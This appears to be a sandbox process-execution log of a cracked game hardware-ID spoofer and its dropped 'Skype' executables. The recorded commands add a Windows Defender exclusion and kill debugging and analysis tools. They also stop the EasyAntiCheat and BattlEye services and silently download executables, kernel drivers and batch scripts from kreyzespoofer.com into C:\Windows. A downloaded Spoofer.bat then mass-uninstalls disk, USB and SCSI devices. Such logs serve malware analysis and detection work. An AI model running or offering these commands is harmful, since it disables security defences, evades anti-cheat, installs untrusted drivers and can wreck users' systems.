C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop EasyAntiCheat
C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\sc.exe
sc stop EasyAntiCheat
C:\Users\Admin\AppData\Roaming\Skype.sfx.exe
"C:\Users\Admin\AppData\Roaming\Skype.sfx.exe"
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Users\Admin\AppData\Roaming\Skype.exe
"C:\Users\Admin\AppData\Roaming\Skype.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\SolaraTab\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im epicgameslauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im epicgameslauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicWebHelper.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicWebHelper.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_EAC.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping_BE.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient - Win64 - Shipping.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient - Win64 - Shipping.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im EasyAntiCheat.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEService.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEService.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BEServices.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BEServices.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im BattleEye.exe > nul
C:\Windows\system32\taskkill.exe
taskkill /f /im BattleEye.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop BattlEye Service
C:\Windows\system32\sc.exe
sc stop BattlEye Service
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop EasyAntiCheat
C:\Windows\system32\sc.exe
sc stop EasyAntiCheat
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ffca019ab58,0x7ffca019ab68,0x7ffca019ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2168 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2920 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4520 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff663e6ae48,0x7ff663e6ae58,0x7ff663e6ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4900 --field-trial-handle=2004,i,8216458192787803915,4146608206302573287,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc860646f8,0x7ffc86064708,0x7ffc86064718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7212 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2192,2657983892865253054,17658997325505702063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7084 /prefetch:8
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
"C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\Downloads\FileGrab.exe
"C:\Users\Admin\Downloads\FileGrab.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/AMIFLDRV64.SYS -o C:\Windows\AMIFLDRV64.SYS --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/AMIFLDRV64.SYS -o C:\Windows\AMIFLDRV64.SYS --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/backgroundcleaner.bat -o C:\Windows\backgroundcleaner.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/backgroundcleaner.bat -o C:\Windows\backgroundcleaner.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/devcon.exe -o C:\Windows\devcon.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/devcon.exe -o C:\Windows\devcon.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/DeviceCleanupCmd.exe -o C:\Windows\DeviceCleanupCmd.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/DeviceCleanupCmd.exe -o C:\Windows\DeviceCleanupCmd.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/DevManView.exe -o C:\Windows\DevManView.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/DevManView.exe -o C:\Windows\DevManView.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/DriveCleanup.exe -o C:\Windows\DriveCleanup.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/DriveCleanup.exe -o C:\Windows\DriveCleanup.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/gen.py -o C:\Windows\gen.py --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/gen.py -o C:\Windows\gen.py --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/kreyzecleaner.exe -o C:\Windows\kreyzecleaner.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/kreyzecleaner.exe -o C:\Windows\kreyzecleaner.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/python310._pth -o C:\Windows\python310._pth --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/python310._pth -o C:\Windows\python310._pth --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/segwindrv.cat -o C:\Windows\segwindrv.cat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/segwindrv.cat -o C:\Windows\segwindrv.cat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/segwindrvx64.sys -o C:\Windows\segwindrvx64.sys --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/segwindrvx64.sys -o C:\Windows\segwindrvx64.sys --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/serials.bat -o C:\Windows\serials.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/serials.bat -o C:\Windows\serials.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/sidchg64-3.0h.exe -o C:\Windows\sidchg64-3.0h.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/sidchg64-3.0h.exe -o C:\Windows\sidchg64-3.0h.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/Spoofer.bat -o C:\Windows\Spoofer.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/Spoofer.bat -o C:\Windows\Spoofer.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/Taskkill_clean.bat -o C:\Windows\Taskkill_clean.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/Taskkill_clean.bat -o C:\Windows\Taskkill_clean.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/Volumeid64.exe -o C:\Windows\Volumeid64.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/Volumeid64.exe -o C:\Windows\Volumeid64.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Spoofer.bat
C:\Windows\system32\PING.EXE
ping www.google.com -n 1
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat_Setup.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicWebHelper.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im BEService_x64.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\sc.exe
sc stop BEService
C:\Windows\system32\sc.exe
sc stop EasyAntiCheat
C:\Windows\DevManView.exe
DevManView.exe /uninstall "SWD\MS*" /use_wildcard
C:\Windows\DeviceCleanupCmd.exe
DeviceCleanupCmd.exe * -s
C:\Windows\DriveCleanup.exe
DriveCleanup.exe
C:\Windows\DevManView.exe
DevManView.exe /uninstall "C:\"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "F:\"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "C:\"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Disk drive*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Disk"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "disk"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Disk&*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "USBSTOR*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Message: Session not found. Use latest code. You can only have app opened 1 at a time. && timeout /t 5"
